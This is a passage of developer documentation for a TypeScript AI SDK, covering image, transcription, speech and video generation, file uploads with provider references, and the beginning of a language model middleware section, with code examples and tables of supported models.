generateImage accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the image generation request.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { image, warnings } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
});
Additional provider-specific metadata
Some providers expose additional metadata for the result overall or per image.
const prompt = 'Santa Claus driving a Cadillac';
const { image, providerMetadata } = await generateImage({
model: openai.image('dall-e-3'),
prompt,
});
const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;
console.log({
prompt,
revisedPrompt,
});
The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. An images key is always present in the metadata and is an array with the same length as the top-level images key.
Error Handling
When generateImage cannot generate a valid image, it throws an AI_NoImageGeneratedError.
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Image Middleware
You can enhance image models, e.g. to set default values or implement logging, using
wrapImageModel and ImageModelV4Middleware.
Here is an example that sets a default size when none is provided:
import { generateImage, wrapImageModel } from 'ai';
__PROVIDER_IMPORT__;
const model = wrapImageModel({
model: __IMAGE_MODEL__,
middleware: {
specificationVersion: 'v3',
transformParams: async ({ params }) => ({
...params,
size: params.size ?? '1024x1024',
}),
},
});
const { image } = await generateImage({
model,
prompt: 'Santa Claus driving a Cadillac',
});
Generating Images with Language Models
Some language models such as Google gemini-2.5-flash-image support multi-modal outputs including images.
With such models, you can access the generated images using the files property of the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image'),
prompt: 'Generate an image of a comic cat',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
// The file object provides multiple data formats:
// Access images as base64 string, Uint8Array binary data, or check type
// - file.base64: string (data URL format)
// - file.uint8Array: Uint8Array (binary data)
// - file.mediaType: string (e.g. "image/png")
}
}
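For example, you can write the generated images to disk (a minimal Node.js sketch; the file naming is illustrative):
import fs from 'node:fs';
let index = 0;
for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // write the binary image data to a file, e.g. image-0.png
    fs.writeFileSync(`image-${index++}.png`, file.uint8Array);
  }
}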
Image Models
| Provider | Model | Supported sizes (width x height) or aspect ratios (width : height) |
|---|---|---|
| xAI Grok | grok-imagine-image | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto |
| OpenAI | gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| OpenAI | dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| OpenAI | dall-e-2 | 256x256, 512x512, 1024x1024 |
| Amazon Bedrock | amazon.nova-canvas-v1:0 | 320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels |
| Fal | fal-ai/flux/dev | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-lora | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/fast-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-pro/v1.1-ultra | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/ideogram/v2 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/recraft-v3 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/stable-diffusion-3.5-large | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/hyper-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| DeepInfra | stabilityai/sd3.5 | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | black-forest-labs/FLUX-1.1-pro | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-schnell | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-dev | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-pro | 256-1440 (multiples of 32) |
| DeepInfra | stabilityai/sd3.5-medium | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | stabilityai/sdxl-turbo | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| Replicate | black-forest-labs/flux-schnell | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Replicate | recraft-ai/recraft-v3 | 1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024 |
| Google Generative AI | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Fireworks | accounts/fireworks/models/flux-1-dev-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/flux-1-schnell-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/playground-v2-5-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/japanese-stable-diffusion-xl | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/playground-v2-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/SSD-1B | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Luma | photon-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Luma | photon-flash-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Together.ai | stabilityai/stable-diffusion-xl-base-1.0 | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev-lora | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-canny | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-depth | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-redux | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell-Free | 512x512, 768x768, 1024x1024 |
| Black Forest Labs | flux-kontext-pro | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-kontext-max | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1-ultra | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1 | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.0-fill | From 3:7 (portrait) to 7:3 (landscape) |
The above is a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Transcription description: Learn how to transcribe audio with the AI SDK.
Transcription
Transcription is an experimental feature.
The AI SDK provides the transcribe
function to transcribe audio using a transcription model.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.
To access the generated transcript:
const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available
Settings
Provider-Specific settings
Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
timestampGranularities: ['word'],
},
},
});
Download Size Limits
When audio is a URL, the SDK downloads the file with a default 2 GiB size limit.
You can customize this using createDownload:
import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});
You can also provide a fully custom download function:
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: async ({ url }) => {
const res = await myAuthenticatedFetch(url);
return {
data: new Uint8Array(await res.arrayBuffer()),
mediaType: res.headers.get('content-type') ?? undefined,
};
},
});
If a download exceeds the size limit, a DownloadError is thrown:
import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
});
} catch (error) {
if (DownloadError.isInstance(error)) {
console.log('Download failed:', error.message);
}
}
Abort Signals and Timeouts
transcribe accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the transcription process or set a timeout.
This is particularly useful when combined with URL downloads to prevent long-running requests:
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});
Custom Headers
transcribe accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the transcription request.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
const warnings = transcript.warnings;
Error Handling
When transcribe cannot generate a valid transcript, it throws an AI_NoTranscriptGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the transcription model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_transcribe as transcribe,
NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
} catch (error) {
if (NoTranscriptGeneratedError.isInstance(error)) {
console.log('NoTranscriptGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Transcription Models
| Provider | Model |
|---|---|
| OpenAI | whisper-1 |
| OpenAI | gpt-4o-transcribe |
| OpenAI | gpt-4o-mini-transcribe |
| ElevenLabs | scribe_v1 |
| ElevenLabs | scribe_v1_experimental |
| Groq | whisper-large-v3-turbo |
| Groq | whisper-large-v3 |
| Azure OpenAI | whisper-1 |
| Azure OpenAI | gpt-4o-transcribe |
| Azure OpenAI | gpt-4o-mini-transcribe |
| Rev.ai | machine |
| Rev.ai | low_cost |
| Rev.ai | fusion |
| Deepgram | base (+ variants) |
| Deepgram | enhanced (+ variants) |
| Deepgram | nova (+ variants) |
| Deepgram | nova-2 (+ variants) |
| Deepgram | nova-3 (+ variants) |
| Gladia | default |
| AssemblyAI | best |
| AssemblyAI | nano |
| Fal | whisper |
| Fal | wizper |
The above is a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Speech description: Learn how to generate speech from text with the AI SDK.
Speech
Speech is an experimental feature.
The AI SDK provides the generateSpeech
function to generate speech from text using a speech model.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
});
Language Setting
You can specify the language for speech generation (provider support varies):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const audio = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hola, mundo!',
language: 'es', // Spanish
});
To access the generated audio:
const audioData = audio.audio.uint8Array; // audio data as Uint8Array
// or
const audioBase64 = audio.audio.base64; // audio data as base64 string
Settings
Provider-Specific settings
You can set model-specific settings with the providerOptions parameter.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
providerOptions: {
openai: {
// ...
},
},
});
Abort Signals and Timeouts
generateSpeech accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the speech generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateSpeech accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the speech generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
const warnings = audio.warnings;
Error Handling
When generateSpeech cannot generate valid audio, it throws an AI_NoSpeechGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the speech model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateSpeech as generateSpeech,
NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
} catch (error) {
if (NoSpeechGeneratedError.isInstance(error)) {
console.log('AI_NoSpeechGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Speech Models
| Provider | Model |
|---|---|
| OpenAI | tts-1 |
| OpenAI | tts-1-hd |
| OpenAI | gpt-4o-mini-tts |
| ElevenLabs | eleven_v3 |
| ElevenLabs | eleven_multilingual_v2 |
| ElevenLabs | eleven_flash_v2_5 |
| ElevenLabs | eleven_flash_v2 |
| ElevenLabs | eleven_turbo_v2_5 |
| ElevenLabs | eleven_turbo_v2 |
| LMNT | aurora |
| LMNT | blizzard |
| Hume | default |
The above is a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Video Generation description: Learn how to generate videos with the AI SDK.
Video Generation
The AI SDK provides the experimental_generateVideo
function to generate videos based on a given prompt using a video model.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
});
You can access the video data using the base64 or uint8Array properties:
const base64 = video.base64; // base64 video data
const uint8Array = video.uint8Array; // Uint8Array video data
Settings
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
aspectRatio: '16:9',
});
Resolution
The resolution is specified as a string in the format {width}x{height}.
Models only support specific resolutions, and the supported resolutions are different for each model and provider.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A serene mountain landscape at sunset',
resolution: '1280x720',
});
Duration
Some video models support specifying the duration of the generated video in seconds.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A timelapse of clouds moving across the sky',
duration: 5,
});
Frames Per Second (FPS)
Some video models allow you to specify the frames per second for the generated video.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A hummingbird in slow motion',
fps: 24,
});
Generating Multiple Videos
experimental_generateVideo supports generating multiple videos at once:
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { videos } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
n: 3, // number of videos to generate
});
Each video model has an internal limit on how many videos it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple videos using the n parameter. Most video models only support generating 1 video per call due to computational cost.
If needed, you can override this behavior using the maxVideosPerCall setting:
const { videos } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
maxVideosPerCall: 2, // Override the default batch size
n: 4, // Will make 2 calls of 2 videos each
});
Image-to-Video Generation
Some video models support generating videos from an input image. You can provide an image using the prompt object:
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: {
image: 'https://example.com/my-image.png',
text: 'Animate this image with gentle motion',
},
});
You can also provide the image as a base64-encoded string or Uint8Array:
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: {
image: imageBase64String, // or imageUint8Array
text: 'Animate this image',
},
});
Providing a Seed
You can provide a seed to the experimental_generateVideo function to control the output of the video generation process.
If supported by the model, the same seed will always produce the same video.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
seed: 1234567890,
});
Provider-specific Settings
Video models often have provider- or even model-specific settings.
You can pass such settings to the experimental_generateVideo function
using the providerOptions parameter. The options for the provider
become request body properties.
import { experimental_generateVideo as generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';
const { video } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt: 'A cat walking on a treadmill',
aspectRatio: '16:9',
providerOptions: {
fal: { loop: true, motionStrength: 0.8 },
},
});
Abort Signals and Timeouts
experimental_generateVideo accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the video generation process or set a timeout.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
abortSignal: AbortSignal.timeout(60000), // Abort after 60 seconds
});
Polling Timeout
Video generation is an asynchronous process that can take several minutes to complete. Most providers use a polling mechanism where the SDK periodically checks if the video is ready. The default polling timeout is typically 5 minutes, which may not be sufficient for longer videos or certain models.
You can configure the polling timeout using provider-specific options. Each provider exports a type for its options that you can use with satisfies for type safety:
import { experimental_generateVideo as generateVideo } from 'ai';
import { fal, type FalVideoModelOptions } from '@ai-sdk/fal';
const { video } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt: 'A cinematic timelapse of a city from dawn to dusk',
duration: 10,
providerOptions: {
fal: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies FalVideoModelOptions,
},
});
Custom Headers
experimental_generateVideo accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the video generation request.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { video, warnings } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
});
Additional Provider-specific Metadata
Some providers expose additional metadata for the result overall or per video.
const prompt = 'A cat walking on a treadmill';
const { video, providerMetadata } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt,
});
// Access provider-specific metadata
const videoMetadata = providerMetadata.fal?.videos[0];
console.log({
duration: videoMetadata?.duration,
fps: videoMetadata?.fps,
width: videoMetadata?.width,
height: videoMetadata?.height,
});
The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. A videos key is typically present in the metadata and is an array with the same length as the top-level videos key.
When generating multiple videos with n > 1, you can also access per-call metadata through the responses array:
const { videos, responses } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
n: 5, // May require multiple API calls
});
// Access metadata from each individual API call
for (const response of responses) {
console.log({
timestamp: response.timestamp,
modelId: response.modelId,
// Per-call provider metadata (lossless)
providerMetadata: response.providerMetadata,
});
}
Error Handling
When experimental_generateVideo cannot generate a valid video, it throws an AI_NoVideoGeneratedError.
This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the video model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateVideo as generateVideo,
NoVideoGeneratedError,
} from 'ai';
try {
await generateVideo({ model, prompt });
} catch (error) {
if (NoVideoGeneratedError.isInstance(error)) {
console.log('NoVideoGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Video Models
| Provider | Model | Features |
|---|---|---|
| FAL | luma-dream-machine/ray-2 | Text-to-video, image-to-video |
| FAL | minimax-video | Text-to-video |
| Google Generative AI | veo-2.0-generate-001 | Text-to-video, up to 4 videos per call |
| Google Vertex | veo-3.1-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.1-fast-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.0-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-3.0-fast-generate-001 | Text-to-video, audio generation |
| Google Vertex | veo-2.0-generate-001 | Text-to-video, up to 4 videos per call |
| Kling AI | kling-v2.6-t2v | Text-to-video |
| Kling AI | kling-v2.6-i2v | Image-to-video |
| Kling AI | kling-v2.6-motion-control | Motion control |
| Replicate | minimax/video-01 | Text-to-video |
| xAI | grok-imagine-video | Text-to-video, image-to-video, editing, extension, R2V |
The above is a small subset of the video models supported by the AI SDK providers. For more, see the respective provider documentation.
title: File Uploads description: Learn how to upload files and use provider references with the AI SDK.
File Uploads
The AI SDK provides the uploadFile
function to upload files to a provider and get back a ProviderReference that can be
used in subsequent API calls.
In the AI SDK, the uploaded file is identified by a ProviderReference — a
Record<string, string> mapping provider names to provider-specific identifiers.
This concept is used for other provider-specific asset references too, such as
uploaded skills.
import { uploadFile, generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
import fs from 'node:fs';
const { providerReference } = await uploadFile({
api: openai.files(),
data: fs.readFileSync('./photo.png'),
filename: 'photo.png',
});
const { text } = await generateText({
model: openai.responses('gpt-4o-mini'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe what you see in this image.' },
{ type: 'image', image: providerReference },
],
},
],
});
As a shorthand, you can pass a provider instance directly to api instead of calling .files() explicitly — the SDK will call .files() for you:
const { providerReference } = await uploadFile({
api: openai, // shorthand for openai.files()
data: fs.readFileSync('./photo.png'),
filename: 'photo.png',
});
Supported File Types
You can upload images, PDFs, text files, and other documents depending on the provider. The media type is auto-detected from the file bytes when not specified explicitly:
const { providerReference } = await uploadFile({
api: anthropic.files(),
data: fs.readFileSync('./document.pdf'),
mediaType: 'application/pdf', // optional, auto-detected if omitted
filename: 'document.pdf',
});
Use the providerReference in a file content part with its media type:
{
role: 'user',
content: [
{ type: 'text', text: 'Summarize this document.' },
{ type: 'file', data: providerReference, mediaType: 'application/pdf' },
],
}
Provider-Specific Options
Some providers accept additional options through providerOptions.
For example, OpenAI requires a purpose field:
import { openai, type OpenAIFilesOptions } from '@ai-sdk/openai';
const { providerReference } = await uploadFile({
api: openai.files(),
data: fs.readFileSync('./photo.png'),
providerOptions: {
openai: {
purpose: 'assistants',
} satisfies OpenAIFilesOptions,
},
});
Provider References
A ProviderReference is a Record<string, string> that maps provider names to
provider-specific file identifiers:
// Example ProviderReference
{
openai: 'file-abc123',
}
When you pass a ProviderReference as the data or image field of a message content
part, the provider looks up its own file ID from the reference. If the reference doesn't
contain an entry for the current provider, an error is thrown.
Multi-Provider Usage
If you switch providers mid-conversation (for example, continuing a chat started with OpenAI using Anthropic), you need to upload the file to both providers and merge the references:
const openaiResult = await uploadFile({
api: openai.files(),
data: imageBytes,
filename: 'photo.png',
});
const anthropicResult = await uploadFile({
api: anthropic.files(),
data: imageBytes,
filename: 'photo.png',
});
const mergedReference = {
...openaiResult.providerReference,
...anthropicResult.providerReference,
};
// mergedReference: { openai: 'file-abc123', anthropic: 'file-xyz789' }
The merged reference can then be used in messages regardless of which provider processes the request — each provider will find its own file ID.
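For example, a sketch of using the merged reference in a message (the model choice is illustrative; an OpenAI model would resolve its own file ID from the same reference):
import { generateText } from 'ai';
import { anthropic } from '@ai-sdk/anthropic';
const { text } = await generateText({
  model: anthropic('claude-opus-4.6'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image.' },
        { type: 'image', image: mergedReference },
      ],
    },
  ],
});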
Supported Providers
The following providers support files() and file uploads:
| Provider | Factory Method |
|---|---|
| Anthropic | anthropic.files() |
| Google Generative AI | google.files() |
| OpenAI | openai.files() |
| xAI | xai.files() |
Providers without file upload support will throw an UnsupportedFunctionalityError
if they encounter a provider reference in a message.
title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models
Language Model Middleware
Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.
It can be used to add features like guardrails, RAG, caching, and logging in a language-model-agnostic way. Such middleware can be developed and distributed independently from the language models it is applied to.
Using Language Model Middleware
You can use language model middleware with the wrapLanguageModel function.
It takes a language model and a language model middleware and returns a new
language model that incorporates the middleware.
import { wrapLanguageModel, streamText } from 'ai';
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: yourLanguageModelMiddleware,
});
The wrapped language model can be used just like any other language model, e.g. in streamText:
const result = streamText({
model: wrappedLanguageModel,
prompt: 'What cities are in the United States?',
});
Multiple middlewares
You can provide multiple middlewares to the wrapLanguageModel function.
The middlewares will be applied in the order they are provided.
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: [firstMiddleware, secondMiddleware],
});
// applied as: firstMiddleware(secondMiddleware(yourModel))
Built-in Middleware
The AI SDK comes with several built-in middlewares that you can use to configure language models:
- extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
- extractJsonMiddleware: Extracts JSON from text content by stripping markdown code fences. Useful when using Output.object() with models that wrap JSON responses in code blocks.
- simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
- defaultSettingsMiddleware: Applies default settings to a language model.
- addToolInputExamplesMiddleware: Adds tool input examples to tool descriptions for providers that don't natively support the inputExamples property.
Extract Reasoning
Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.
The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
The extractReasoningMiddleware function also includes a startWithReasoning option.
